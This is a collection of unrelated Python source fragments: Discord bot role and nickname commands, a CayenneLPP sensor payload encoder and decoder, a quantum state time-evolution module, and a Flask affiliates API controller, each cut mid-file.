await self.bot.say('Deregistered role **{}** from selfroles 📑'.format(to_register[0].name))
else:
await self.bot.say('Deregistered roles **{}** from selfroles 📑'
''.format(', '.join([r.name for r in to_register])))
@selfroles.command(pass_context=True, aliases=['list', 'l'])
@self.bot.test_server
async def listall(server, ctx):
if server.selfroles:
valid_roles = [x for x in ctx.message.server.roles if x.id in server.selfroles]
role_names = []
for role in valid_roles: # type: discord.Role
if role.mentionable:
role_names.append(role.mention)
else:
role_names.append('**{}**'.format(role.name))
else:
await self.bot.say('There are no selfroles in this server.')
return
em = discord.Embed(title=TITLE_BAR, color=0xb600ff,
description='Self-assignable roles:\n'
'{}\n'
'Use `{}selfroles <add/get> [role/comma-seperated list of roles]`'
''.format('\n'.join(role_names), self.bot.command_prefix))
em.set_author(name='Selfroles', icon_url='https://abs.twimg.com/emoji/v2/72x72/1f4c3.png') # curly page
await self.bot.say(embed=em)
@selfroles.command(pass_context=True, aliases=['get'])
@self.bot.test_server
async def add(server, ctx, *, arg):
if not server.selfroles:
await self.bot.say('Selfroles are not enabled for this server.')
return
extracted = self.extract_roles(ctx, arg)
if not extracted:
await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
return
to_add = [x for x in extracted if x.id in server.selfroles]
if to_add:
try:
await self.bot.add_roles(ctx.message.author, *to_add)
except discord.Forbidden:
await self.bot.say('I do not have permission to do this. ❌')
return
except discord.HTTPException:
await self.bot.say('An unknown error occurred :( You could try again...')
return
await self.bot.say('You now have roles: **{}** ✅'.format(', '.join([x.name for x in to_add])))
else:
await self.bot.say('Please choose from the list of selfroles. ❌')
@selfroles.command(pass_context=True)
@self.bot.test_server
async def remove(server, ctx, *, arg):
if not server.selfroles:
await self.bot.say('Selfroles are not enabled for this server.')
return
author = ctx.message.author
extracted = self.extract_roles(ctx, arg)
if not extracted:
await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
return
to_remove = [x for x in extracted if x.id in server.selfroles and x in author.roles]
if to_remove:
try:
await self.bot.remove_roles(ctx.message.author, *to_remove)
except discord.Forbidden:
await self.bot.say('I do not have permission to do this. ❌')
return
except discord.HTTPException:
await self.bot.say('An unknown error occurred :( You could try again...')
return
await self.bot.say('Removed the following roles: **{}** ✅'.format(', '.join([x.name for x in to_remove])))
else:
await self.bot.say('Please provide valid selfroles to remove. ❌')
@self.bot.command(pass_context=True)
async def getraw(ctx, arg: str, arg2: str = None):
if arg == 'help':
await self.bot.send_message(ctx.message.author, '**Getraw help:**\n'
'`{0}getraw [message id]`\n'
'`{0}getraw [channel id] [message id]`\n'
'Returns the raw string from a message. Useful '
'to capture `:id:` formatted emoji. If `channel_id` '
'is not provided, current channel will be used.'
''.format(self.bot.command_prefix))
return
if not is_num(arg):
return
try:
msg = None
if arg2:
msg = await self.bot.get_message(self.bot.get_channel(arg), arg2)
else:
m_count = int(arg)
if m_count <= 30:
i = 0
async for m in self.bot.logs_from(ctx.message.channel, limit=30):
if i >= m_count:
msg = m
break
i += 1
else:
msg = await self.bot.get_message(ctx.message.channel, arg)
if not msg:
await self.bot.say('Message not found.')
return
await self.bot.say('```\n{}\n```'.format(msg.content))
except discord.Forbidden:
await self.bot.say("I don't have permission for that")
@self.bot.command(pass_context=True, aliases=['nickall', 'nick-all'])
@self.bot.test_high_perm
async def nick_all(server, ctx, new_name: str):
if ctx.message.author.id == '<PASSWORD>':
if new_name == 'reset':
await self.bot.say('Resetting all nicknames...')
else:
await self.bot.say('Setting all nicknames to `{}`'.format(new_name))
await asyncio.sleep(5)
await self.bot.send_message(ctx.message.channel, 'haha jk')
return
if new_name == 'reset':
new_name = None
await self.bot.say('Resetting all nicknames...')
else:
await self.bot.say('Setting all nicknames to `{}`'.format(new_name))
failures = []
for m in ctx.message.server.members:
try:
await self.bot.change_nickname(m, new_name)
except discord.Forbidden:
failures.append(m)
except discord.HTTPException:
failures.append(m)
if len(failures) > 0:
await self.bot.say(
'Operation complete. Failed to change: {}'.format(', '.join([x.name for x in failures])))
@self.bot.command(pass_context=True, aliases=['nick'])
@self.bot.test_server
async def nickname(server, ctx, member: discord.Member, new_name: str):
author = ctx.message.author
if not author.server_permissions.change_nickname():
await self.bot.say('You do not have permission to change your nickname.', delete=5)
return
if author != member and not author.server_permissions.manage_nicknames():
await self.bot.say('You do not have permission to change others\' nicknames.', delete=5)
return
if author != member and author.server_permissions < member.server_permissions:
await self.bot.say('You do not have permission to change {}\'s nickname.'.format(member.name),
delete=5)
return
if new_name.lower() in ['reset', 'revert', 'clear', 'original']:
new_name = None
try:
await self.bot.change_nickname(member, new_name)
except discord.Forbidden:
await self.bot.say('I do not have permission to do this. ❌')
return
except discord.HTTPException:
await self.bot.say('An unknown error occurred :( You could try again...')
return
| |
try:
import logging
except ImportError:
class logging:
def debug(self, *args, **kwargs):
pass
def __assert_data_tuple(data, num):
"""Internal helper to ensure data is a tuple of given `num` length."""
if not isinstance(data, tuple):
data = (data,)
if not len(data) == num:
raise AssertionError()
return data
def __from_bytes(buf, buflen):
"""Internal helper to parse a number from buffer."""
logging.debug(" in: bytes = %s, length = %d", buf, len(buf))
if not len(buf) == buflen:
raise AssertionError()
val = 0
for i in range(buflen):
shift = (buflen - i - 1) * 8
val |= buf[i] << shift
logging.debug(" out: value = %d", val)
return val
def __to_bytes(val, buflen):
"""Internal helper to write a value to a buffer."""
logging.debug(" in: value = %d", val)
buf = bytearray(buflen)
for i in range(buflen):
shift = (buflen - i - 1) * 8
buf[i] = (val >> shift) & 0xff
logging.debug(" out: bytes = %s, length = %d", buf, len(buf))
return buf
def __to_signed(val, bits):
"""Internal helper to convert unsigned int to signed of `bits` length."""
logging.debug(" in: value = %d", val)
mask = 0x00
for i in range(int(bits / 8)):
mask |= 0xff << (i * 8)
if val >= (1 << (bits - 1)):
val = -1 - (val ^ mask)
logging.debug(" out: value = %d", val)
return val
def __to_s16(val):
return __to_signed(val, 16)
def __to_s24(val):
return __to_signed(val, 24)
def __to_unsigned(val):
"""Convert signed (2 complement) value to unsigned."""
if val < 0:
val = ~(-val - 1)
return val
def lpp_digital_io_from_bytes(buf):
"""Decode digitial input/output from byte buffer and return value tuple."""
logging.debug("lpp_digital_io_from_bytes")
val = __from_bytes(buf, 1)
return (val,)
def lpp_digital_io_to_bytes(data):
"""Encode digitial in/output into CayenneLPP and return byte buffer."""
logging.debug("lpp_digital_io_to_bytes")
data = __assert_data_tuple(data, 1)
return __to_bytes(data[0], 1)
def lpp_voltage_from_bytes(buf):
"""Decode voltage from byte buffer and return value tuple."""
logging.debug("lpp_voltage_from_bytes")
val_i = __from_bytes(buf, 2)
if val_i >= (1 << 15):
logging.error("Negative Voltage value is not allowed")
raise AssertionError("Negative values are not allowed.")
val = val_i / 100.0
logging.debug(" out: value = %f", val)
return (val,)
def lpp_voltage_to_bytes(data):
"""Encode voltage into CayenneLPP and return byte buffer."""
logging.debug("lpp_voltage_to_bytes")
data = __assert_data_tuple(data, 1)
val = data[0]
if val < 0:
logging.error("Negative Voltage value is not allowed")
raise AssertionError("Negative values are not allowed")
logging.debug(" in: value = %f", val)
val_i = int(val * 100)
return __to_bytes(val_i, 2)
def lpp_analog_io_from_bytes(buf):
"""Decode analog in/output from byte buffer and return value tupel."""
logging.debug("lpp_analog_io_from_bytes")
val_i = __from_bytes(buf, 2)
val_i = __to_s16(val_i)
val = val_i / 100.0
logging.debug(" out: value = %f", val)
return (val,)
def lpp_analog_io_to_bytes(data):
"""Encode analog in/output into CayenneLPP and return byte buffer."""
logging.debug("lpp_analog_io_to_bytes")
data = __assert_data_tuple(data, 1)
val = data[0]
logging.debug(" in: value = %f", val)
val_i = int(val * 100)
logging.debug(" in: value = %d", val_i)
val_i = __to_unsigned(val_i)
return __to_bytes(val_i, 2)
def lpp_generic_from_bytes(buf):
"""Decode 4 byte unsigned int from byte buffer and return value tuple."""
logging.debug("lpp_generic_from_bytes")
val_i = __from_bytes(buf, 4)
return (val_i,)
def lpp_generic_to_bytes(data):
"""Encode unsigned 4 byte int into CayenneLpp and return byte buffer."""
logging.debug("lpp_generic_to_bytes")
data = __assert_data_tuple(data, 1)
val_i = int(data[0])
logging.debug(" in: value = %i", val_i)
if val_i < 0:
raise ValueError("Negative values are not allowed")
if val_i >= (1 << 32):
raise ValueError("Values larger than 4294967295 are not allowed")
return __to_bytes(val_i, 4)
def lpp_unix_time_from_bytes(buf):
"""Decode 4 byte unix timestamp from byte buffer and return value tuple."""
logging.debug("lpp_unix_time_from_bytes")
val_i = __from_bytes(buf, 4)
if val_i >= (1 << 31):
raise ValueError("Unix timestamp can not be negative.")
return (val_i,)
def lpp_unix_time_to_bytes(data):
"""Encode 4 byte unix timestamp into CayenneLpp and return byte buffer."""
logging.debug("lpp_unix_time_to_bytes")
data = __assert_data_tuple(data, 1)
val_i = int(data[0])
logging.debug(" in: value = %i", val_i)
if val_i < 0:
raise ValueError("Negative values are not allowed")
return __to_bytes(val_i, 4)
def lpp_illuminance_from_bytes(buf):
"""Decode illuminance data from byte buffer and return value tupel."""
logging.debug("lpp_illuminance_from_bytes")
val = int(__from_bytes(buf, 2))
return (val,)
def lpp_illuminance_to_bytes(data):
"""Encode illuminance data into CayenneLPP and return byte buffer."""
logging.debug("lpp_illuminance_to_bytes")
data = __assert_data_tuple(data, 1)
val_i = int(data[0])
if val_i < 0:
raise ValueError("Illuminance sensor values must be positive!")
return __to_bytes(val_i, 2)
def lpp_presence_from_bytes(buf):
"""Decode presence data byte buffer and return value tupel."""
logging.debug("lpp_presence_from_bytes")
val = __from_bytes(buf, 1)
return (val,)
def lpp_presence_to_bytes(data):
"""Encode presence data into CayenneLPP and return byte buffer."""
logging.debug("lpp_presence_to_bytes")
data = __assert_data_tuple(data, 1)
val_i = int(data[0])
if val_i < 0:
raise ValueError("Presence sensor values must be positive!")
return __to_bytes(val_i, 1)
def lpp_temperature_from_bytes(buf):
"""Decode temperature data byte buffer and return value tupel."""
logging.debug("lpp_temperature_from_bytes")
val_i = __from_bytes(buf, 2)
val_i = __to_s16(val_i)
val = val_i / 10.0
logging.debug(" out: value = %f", val)
return (val, )
def lpp_temperature_to_bytes(data):
"""Encode temperature data into CayenneLPP and return byte buffer."""
logging.debug("lpp_temperature_to_bytes")
data = __assert_data_tuple(data, 1)
val = data[0]
logging.debug(" in: value = %f", val)
val_i = int(val * 10)
logging.debug(" in: value = %d", val_i)
val_i = __to_unsigned(val_i)
return __to_bytes(val_i, 2)
def lpp_humidity_from_bytes(buf):
"""Decode humidity data from byte buffer and return value tupel."""
logging.debug("lpp_humidity_from_bytes")
val_i = __from_bytes(buf, 1)
val = val_i / 2.0
logging.debug(" out: value = %f", val)
return (val, )
def lpp_humidity_to_bytes(data):
"""Encode humidity data into CayenneLPP and return as a byte buffer."""
logging.debug("lpp_humidity_to_bytes")
data = __assert_data_tuple(data, 1)
val = data[0]
logging.debug(" in: value = %f", val)
val_i = int(val * 2)
if val_i < 0:
raise ValueError("Humidity sensor values must be positive!")
return __to_bytes(val_i, 1)
def lpp_accel_from_bytes(buf):
"""Decode accelerometer data byte buffer and return values tupel."""
logging.debug("lpp_accel_from_bytes")
logging.debug(" in: bytes = %s, length = %d", buf, len(buf))
if not len(buf) == 6:
raise AssertionError()
val_xi = __from_bytes(buf[0:2], 2)
val_yi = __from_bytes(buf[2:4], 2)
val_zi = __from_bytes(buf[4:6], 2)
logging.debug(" out: x = %d, y = %d, z = %d", val_xi, val_yi, val_zi)
val_xi = __to_s16(val_xi)
val_yi = __to_s16(val_yi)
val_zi = __to_s16(val_zi)
logging.debug(" out: x = %d, y = %d, z = %d", val_xi, val_yi, val_zi)
val_x = val_xi / 1000.0
val_y = val_yi / 1000.0
val_z = val_zi / 1000.0
logging.debug(" out: x = %f, y = %f, z = %f", val_x, val_y, val_z)
return (val_x, val_y, val_z,)
def lpp_accel_to_bytes(data):
"""Encode accelerometer data into CayenneLPP and return byte buffer."""
logging.debug("lpp_accel_to_bytes")
data = __assert_data_tuple(data, 3)
val_x = data[0]
val_y = data[1]
val_z = data[2]
logging.debug(" in: x = %f, y = %f, z = %f", val_x, val_y, val_z)
val_xi = int(val_x * 1000)
val_yi = int(val_y * 1000)
val_zi = int(val_z * 1000)
logging.debug(" in: x = %d, y = %d, z = %d", val_xi, val_yi, val_zi)
val_xi = __to_unsigned(val_xi)
val_yi = __to_unsigned(val_yi)
val_zi = __to_unsigned(val_zi)
logging.debug(" in: x = %d, y = %d, z = %d", val_xi, val_yi, val_zi)
buf = bytearray([0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
buf[0:2] = __to_bytes(val_xi, 2)
buf[2:4] = __to_bytes(val_yi, 2)
buf[4:6] = __to_bytes(val_zi, 2)
logging.debug(" out: bytes = %s, length = %d", buf, len(buf))
return buf
def lpp_baro_from_bytes(buf):
"""Decode barometer data byte buffer and return value tupel."""
logging.debug("lpp_baro_from_bytes")
val = __from_bytes(buf, 2)
val = val / 10.0
logging.debug(" out: value = %f", val)
return (val,)
def lpp_baro_to_bytes(data):
"""Encode barometer data into CayenneLPP and return byte buffer."""
logging.debug("lpp_baro_to_bytes")
data = __assert_data_tuple(data, 1)
val = data[0]
logging.debug(" in: value = %f", val)
val_i = int(val * 10)
if val_i < 0:
raise ValueError("Barometer sensor values must be positive!")
return __to_bytes(val_i, 2)
def lpp_gyro_from_bytes(buf):
"""Decode gyrometer data byte buffer and return value tupel."""
logging.debug("lpp_gyro_from_bytes")
logging.debug(" in: bytes = %s, length = %d", buf, len(buf))
if not len(buf) == 6:
raise AssertionError()
val_xi = __from_bytes(buf[0:2], 2)
val_yi = __from_bytes(buf[2:4], 2)
val_zi = __from_bytes(buf[4:6], 2)
logging.debug(" out: x = %d, y = %d, z = %d", val_xi, val_yi, val_zi)
val_xi = __to_s16(val_xi)
val_yi = __to_s16(val_yi)
val_zi = __to_s16(val_zi)
logging.debug(" out: x = %d, y = %d, z = %d", val_xi, val_yi, val_zi)
val_x = val_xi / 100.0
val_y = val_yi / 100.0
val_z = val_zi / 100.0
logging.debug(" out: x = %f, y = %f, z = %f", val_x, val_y, val_z)
return (val_x, val_y, val_z,)
def lpp_gyro_to_bytes(data):
"""Encode gyrometer data into CayenneLPP and return byte buffer."""
logging.debug("lpp_gyro_to_bytes")
data = __assert_data_tuple(data, 3)
val_x = data[0]
val_y = data[1]
val_z = data[2]
logging.debug(" in: x = %f, y = %f, z = %f", val_x, val_y, val_z)
val_xi | |
"""Easy and efficient time evolutions.
Contains an evolution class, Evolution to easily and efficiently manage time
evolution of quantum states according to the Schrodinger equation,
and related functions.
"""
import functools
import numpy as np
from scipy.integrate import complex_ode
from .core import (qarray, isop, ldmul, rdmul, explt,
dot, issparse, qu, eye, dag)
from .linalg.base_linalg import eigh, norm, expm_multiply
from .utils import continuous_progbar, progbar
# --------------------------------------------------------------------------- #
# Quantum evolution equations #
# --------------------------------------------------------------------------- #
#
# This are mostly just to be used internally with the integrators
def schrodinger_eq_ket(ham):
"""Wavefunction schrodinger equation.
Parameters
----------
ham : operator
Time-independant Hamiltonian governing evolution.
Returns
-------
psi_dot(t, y) : callable
Function to calculate psi_dot(t) at psi(t).
"""
def psi_dot(_, y):
return -1.0j * dot(ham, y)
return psi_dot
def schrodinger_eq_dop(ham):
"""Density operator schrodinger equation, but with flattened input/output.
Note that this assumes both `ham` and `rho` are hermitian in order to speed
up the commutator, non-hermitian hamiltonians as used to model loss should
be treated explicilty or with `schrodinger_eq_dop_vectorized`.
Parameters
----------
ham : operator
Time-independant Hamiltonian governing evolution.
Returns
-------
rho_dot(t, y) : callable
Function to calculate rho_dot(t) at rho(t), input and
output both in ravelled (1D form).
"""
d = ham.shape[0]
def rho_dot(_, y):
hrho = dot(ham, y.reshape(d, d))
return -1.0j * (hrho - hrho.T.conj()).reshape(-1)
return rho_dot
def schrodinger_eq_dop_vectorized(ham):
"""Density operator schrodinger equation, but with flattened input/output
and vectorised superoperator mode (no reshaping required).
Note that this is probably only more efficient for sparse Hamiltonians.
Parameters
----------
ham: time-independant hamiltonian governing evolution
Returns
-------
rho_dot(t, y) : callable
Function to calculate rho_dot(t) at rho(t), input and
output both in ravelled (1D form).
"""
d = ham.shape[0]
sparse = issparse(ham)
idt = eye(d, sparse=sparse)
evo_superop = -1.0j * ((ham & idt) - (idt & ham.T))
def rho_dot(_, y):
return dot(evo_superop, y)
return rho_dot
def lindblad_eq(ham, ls, gamma):
"""Lindblad equation, but with flattened input/output.
Parameters
----------
ham : operator
Time-independant hamiltonian governing evolution.
ls : sequence of matrices
Lindblad operators.
gamma : float
Dampening strength.
Returns
-------
rho_dot(t, y) : callable
Function to calculate rho_dot(t) at rho(t), input and
output both in ravelled (1D form).
"""
d = ham.shape[0]
lls = tuple(dot(dag(l), l) for l in ls)
def gen_l_terms(rho):
for l, ll in zip(ls, lls):
yield (dot(l, dot(rho, dag(l))) -
0.5 * (dot(rho, ll) + dot(ll, rho)))
def rho_dot(_, y):
rho = y.reshape(d, d)
rho_d = dot(ham, rho)
rho_d -= rho_d.T.conj()
rho_d *= -1.0j
rho_d += gamma * sum(gen_l_terms(rho))
return np.asarray(rho_d).reshape(-1)
return rho_dot
def lindblad_eq_vectorized(ham, ls, gamma, sparse=False):
"""Lindblad equation, but with flattened input/output and vectorised
superoperation mode (no reshaping required).
Parameters
----------
ham : operator
Time-independant hamiltonian governing evolution.
ls : sequence of matrices
Lindblad operators.
gamma : float
Dampening strength.
Returns
-------
rho_dot(t, y) : callable
Function to calculate rho_dot(t) at rho(t), input and
output both in ravelled (1D form).
"""
d = ham.shape[0]
ham_sparse = issparse(ham) or sparse
idt = eye(d, sparse=ham_sparse)
evo_superop = -1.0j * ((ham & idt) - (idt & ham.T))
def gen_lb_terms():
for l in ls:
lb_sparse = issparse(l) or sparse
idt = eye(d, sparse=lb_sparse)
yield ((l & l.conj()) - 0.5 * ((idt & dot(dag(l), l).T) +
(dot(dag(l), l) & idt)))
evo_superop += gamma * sum(gen_lb_terms())
def rho_dot(_, y):
return dot(evo_superop, y)
return rho_dot
def _calc_evo_eq(isdop, issparse, isopen=False):
"""Choose an appropirate dynamical equation to evolve with.
"""
eq_chooser = {
(0, 0, 0): schrodinger_eq_ket,
(0, 1, 0): schrodinger_eq_ket,
(1, 0, 0): schrodinger_eq_dop,
(1, 1, 0): schrodinger_eq_dop_vectorized,
(1, 0, 1): lindblad_eq,
(1, 1, 1): lindblad_eq_vectorized,
}
return eq_chooser[(isdop, issparse, isopen)]
# --------------------------------------------------------------------------- #
# Quantum Evolution Class #
# --------------------------------------------------------------------------- #
class Evolution(object):
"""A class for evolving quantum systems according to Schrodinger equation.
The evolution can be performed in a number of ways:
- diagonalise the Hamiltonian (or use already diagonalised system).
- integrate the complex ODE, that is, the Schrodinger equation, using
scipy. Here either a mid- or high-order Dormand-Prince adaptive
time stepping scheme is used (see
:class:`scipy.integrate.complex_ode`).
Parameters
----------
p0 : quantum state
Inital state, either vector or operator. If vector, converted to ket.
ham : operator, or tuple (1d array, operator).
Governing Hamiltonian, if tuple then assumed to contain
``(eigvals, eigvecs)`` of presolved system.
t0 : float, optional
Initial time (i.e. time of state ``p0``), defaults to zero.
compute : callable, or dict of callable, optional
Function(s) to compute on the state at each time step, called
with args (t, pt). If supplied with:
- single callable : ``Evolution.results`` will contain the results
as a list,
- dict of callables : ``Evolution.results`` will contain the
results as a dict of lists with corresponding keys to those
given in ``compute``.
method : {'integrate', 'solve', 'expm'}
How to evolve the system:
- ``'integrate'``: use definite integration. Get system at each
time step, only need action of Hamiltonian on state. Generally
efficient.
- ``'solve'``: diagonalise dense hamiltonian. Best for small
systems and allows arbitrary time steps without loss of
precision.
- ``'expm'``: compute the evolved state using the action of the
operator exponential in a 'single shot' style. Only needs action
of Hamiltonian, for very large systems can use distributed MPI.
int_small_step : bool, optional
If ``method='integrate'``, whether to use a low or high order
integrator to give naturally small or large steps.
expm_backend : {'auto', 'scipy', 'slepc'}
How to perform the expm_multiply function if ``method='expm'``. Can
further specifiy ``'slepc-krylov'``, or ``'slepc-expokit'``.
expm_opts : dict
Supplied to :func:`~quimb.linalg.base_linalg.expm_multiply`
function if ``method='expm'``.
progbar : bool, optional
Whether to show a progress bar when calling ``at_times`` or integrating
with the ``update_to`` method.
"""
def __init__(self, p0, ham, t0=0,
compute=None,
method='integrate',
int_small_step=False,
expm_backend='AUTO',
expm_opts=None,
progbar=False):
self._p0 = qu(p0)
self._t = self.t0 = t0
self._isdop = isop(self._p0) # Density operator evolution?
self._d = p0.shape[0] # Hilbert space dimension
self._progbar = progbar
self._setup_callback(compute)
self._method = method
if method == 'solve' or isinstance(ham, (tuple, list)):
self._solve_ham(ham)
elif method == 'integrate':
self._start_integrator(ham, int_small_step)
elif method == 'expm':
self._update_method = self._update_to_expm_ket
self._pt = self._p0
self.ham = ham
self.expm_backend = expm_backend
self.expm_opts = {} if expm_opts is None else dict(expm_opts)
else:
raise ValueError("Did not understand evolution method: '{}'."
.format(method))
def _setup_callback(self, fn):
"""Setup callbacks in the correct place to compute into _results
"""
if fn is None:
step_callback = None
if not self._progbar:
int_step_callback = None
else:
def int_step_callback(t, y):
pass
# dict of funcs input -> dict of funcs output
elif isinstance(fn, dict):
self._results = {k: [] for k in fn}
@functools.wraps(fn)
def step_callback(t, pt):
for k, v in fn.items():
self._results[k].append(v(t, pt))
# For the integration callback, additionally need to convert
# back to 'quantum' (column vector) form
@functools.wraps(fn)
def int_step_callback(t, y):
pt = qarray(y.reshape(self._d, -1))
for k, v in fn.items():
self._results[k].append(v(t, pt))
# else results -> single list of outputs of fn
else:
self._results = []
@functools.wraps(fn)
def step_callback(t, pt):
self._results.append(fn(t, pt))
@functools.wraps(fn)
def int_step_callback(t, y):
pt = qarray(y.reshape(self._d, -1))
self._results.append(fn(t, pt))
self._step_callback = step_callback
self._int_step_callback = int_step_callback
def _solve_ham(self, ham):
"""Solve the supplied hamiltonian and find the initial state in the
energy eigenbasis for quick evolution later.
"""
# See if already solved from tuple
try:
self._evals, self._evecs = ham
self._method = 'solve'
except ValueError:
self._evals, self._evecs = eigh(ham.A)
# Find initial state in energy eigenbasis at t0
if self._isdop:
self.pe0 = dot(dag(self._evecs), dot(self._p0, self._evecs))
self._update_method = self._update_to_solved_dop
else:
self.pe0 = dot(dag(self._evecs), self._p0)
self._update_method = self._update_to_solved_ket
# Current state (start with same as initial)
self._pt = self._p0
self._solved = True
def _start_integrator(self, ham, small_step):
"""Initialize a stepping integrator.
"""
self._sparse_ham = issparse(ham)
# set complex ode with governing equation
evo_eq = _calc_evo_eq(self._isdop, self._sparse_ham)
self._stepper = complex_ode(evo_eq(ham))
# 5th order stpper or 8th order stepper
int_mthd, step_fct = ('dopri5', 150) if small_step else ('dop853', 50)
first_step = norm(ham, 'f') / step_fct
self._stepper.set_integrator(int_mthd, nsteps=0, first_step=first_step)
# Set step_callback to be evaluated with args (t, y) at each step
if self._int_step_callback is not None:
self._stepper.set_solout(self._int_step_callback)
self._stepper.set_initial_value(self._p0.A.reshape(-1), self.t0)
# assign the correct update_to method
self._update_method = self._update_to_integrate
self._solved = False
# Methods for updating the | |
<gh_stars>1-10
"""
**Module - View Controller for Affiliates API**
*Class Definitions for managing access to the database and validation of user input*
"""
__developer__ = "mobius-crypt"
__email__ = "<EMAIL>"
__twitter__ = "@blueitserver"
__github_repo__ = "https://github.com/freelancing-solutions/memberships-and-affiliate-api"
__github_profile__ = "https://github.com/freelancing-solutions/"
import typing
from typing import Optional, List
from flask import current_app, jsonify
from google.cloud import ndb
from _sdk._email import Mailgun
from cache.cache_manager import app_cache
from config.exception_handlers import handle_view_errors
from config.exceptions import DataServiceError, InputError, UnAuthenticatedError, error_codes, status_codes
from config.use_context import use_context
from database.affiliates import Affiliates, Recruits, EarningsData
from database.affiliates import AffiliatesValidators as ValidAffiliate
from database.affiliates import EarningsValidators as ValidEarnings
from database.affiliates import RecruitsValidators as ValidRecruit
from utils.utils import create_id, return_ttl
# from cache.cache_manager import CacheManager
class AffiliatesEmails(Mailgun):
"""
**Class AffiliatesEmails**
gives the ability to send email notifications to affiliates when certain
actions must be taken or updates have occurred.
**Class Methods**
1. __do_send_mail -> actually send emails to users - through mailgun api
"""
def __init__(self):
super(AffiliatesEmails, self).__init__()
self._send_with: str = 'mailgun'
# TODO add more email providers here
# TODO Create Test Cases for Affiliates View and Documentations
# Dont Edit Just Watch can you see this
class Validator(ValidAffiliate, ValidRecruit, ValidEarnings):
"""
**Class Validator**
Gathers validator classes needed for validating actions and input on
while managing Affiliates.
"""
def __init__(self):
super(Validator, self).__init__()
# noinspection PyTypeChecker
def can_register_affiliate(self, organization_id: str, uid: str) -> bool:
"""
**can_register_affiliate**
returns true if user can add an affiliate into this organization
:param organization_id:
:param uid:
:return:
"""
if not isinstance(organization_id, str) or not bool(organization_id.strip()):
message: str = "organization_id is required"
raise InputError(
status=error_codes.input_error_code, description=message)
if not isinstance(uid, str) or not bool(uid.strip()):
message: str = "uid is required"
raise InputError(
status=error_codes.input_error_code, description=message)
# this means the user recruiting this affiliate is already a registered affiliate
already_registered: typing.Union[bool, None] = self.recruiter_registered(organization_id=organization_id,
uid=uid)
if isinstance(already_registered, bool):
return not already_registered
message: str = "Unable to verify input data, due to database error, please try again later"
raise DataServiceError(
status=error_codes.data_service_error_code, description=message)
def _create_unique_affiliate_id(self) -> str:
"""
**_create_unique_affiliate_id**
returns an id that does not conflict with any affiliate id
:return:
"""
_id = create_id()
affiliate_instance: Affiliates = Affiliates.query(
Affiliates.affiliate_id == _id).get()
return self._create_unique_affiliate_id() if affiliate_instance.uid == _id else _id
# noinspection DuplicatedCode
class AffiliatesView(Validator):
"""
**Class AffiliatesView**
Enables the api to access methods to access data and create and update affiliates
also insures that input is validated and users are authenticated
"""
def __init__(self):
super(AffiliatesView, self).__init__()
self._max_retries = current_app.config.get('DATASTORE_RETRIES')
self._max_timeout = current_app.config.get('DATASTORE_TIMEOUT')
@use_context
@handle_view_errors
def register_affiliate(self, affiliate_data: dict) -> tuple:
"""
**register_affiliate**
Register new affiliate, affiliate_data must contain the uid of the affiliate
being recruited and organization_id of the organization recruiting the affiliate.
:param affiliate_data:
:return: tuple with registered affiliate
"""
uid: Optional[str] = affiliate_data.get('uid')
organization_id: Optional[str] = affiliate_data.get('organization_id')
# NOTE can register affiliate will check organization_id and uid are valid
if not self.can_register_affiliate(organization_id=organization_id, uid=uid):
message: str = "You are not authorized to register as an affiliate"
raise UnAuthenticatedError(
status=error_codes.un_auth_error_code, description=message)
# NOTE: this creates globally unique Affiliate Key
affiliate_id: str = self._create_unique_affiliate_id()
# NOTE: other affiliates fields will be auto completed - be defaults
affiliate_instance: Affiliates = Affiliates(**affiliate_data)
key: Optional[ndb.Key] = affiliate_instance.put(
retries=self._max_retries, timeout=self._max_timeout)
if not isinstance(key, ndb.Key):
message: str = "There was an error creating Affiliate"
raise DataServiceError(
status=error_codes.data_service_error_code, description=message)
# scheduling cache deletions
_kwargs: dict = dict(
affiliates_view=self, organization_id=organization_id, affiliate_id=affiliate_id)
app_cache._schedule_cache_deletion(
func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
return jsonify({'status': True,
'message': 'successfully registered an affiliate',
'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
def total_recruits(self, affiliate_data: dict, add: int = 0) -> tuple:
"""
**total_recruits**
given an existing affiliate update total recruits field in the affiliate record
:param affiliate_data:
:param add:
:return:
"""
affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
organization_id: Optional[str] = affiliate_data.get('organization_id')
if not isinstance(affiliate_id, str) or not bool(affiliate_id.strip()):
message = 'affiliate_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
if not isinstance(organization_id, str) or not bool(organization_id.strip()):
message: str = 'organization_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
if not isinstance(add, int):
message: str = "add: amount to update total_recruits is required"
raise InputError(
status=error_codes.input_error_code, description=message)
affiliate_instance: Affiliates = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.affiliate_id == affiliate_id).get()
if not (isinstance(affiliate_instance, Affiliates) and bool(affiliate_instance)):
return jsonify({'status': False, 'message': 'Failed to locate affiliate'}), status_codes.data_not_found_code
affiliate_instance.total_recruits += add
key = affiliate_instance.put(
retries=self._max_retries, timeout=self._max_timeout)
if not isinstance(key, ndb.Key):
message: str = "Something went wrong while updating affiliate"
raise DataServiceError(status=500, description=message)
# deleting affiliate Caches related to the updated record
_kwargs: dict = dict(affiliates_view=AffiliatesView, organization_id=organization_id,
affiliate_id=affiliate_id)
app_cache._schedule_cache_deletion(
func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
return jsonify({'status': True,
'message': 'successfully incremented total recruits',
'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
def delete_affiliate(self, affiliate_data: dict) -> tuple:
"""
**delete_affiliate**
the function soft delete an affiliate record.
affiliate_id: is the id of the affiliate to be marked as deletedItem
organization_id: is the id of the organization from which the affiliate is to be deleted
:param affiliate_data: dict containing affiliate_id and organization_id
:return: tuple containing the record of the deleted affiliate
"""
affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
if not isinstance(affiliate_id, str) or not bool(affiliate_id.strip()):
message: str = 'affiliate_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
organization_id: Optional[str] = affiliate_data.get('organization_id')
if not isinstance(organization_id, str) or not bool(organization_id.strip()):
message: str = 'organization_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
affiliate_instance: Affiliates = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.affiliate_id == affiliate_id).get()
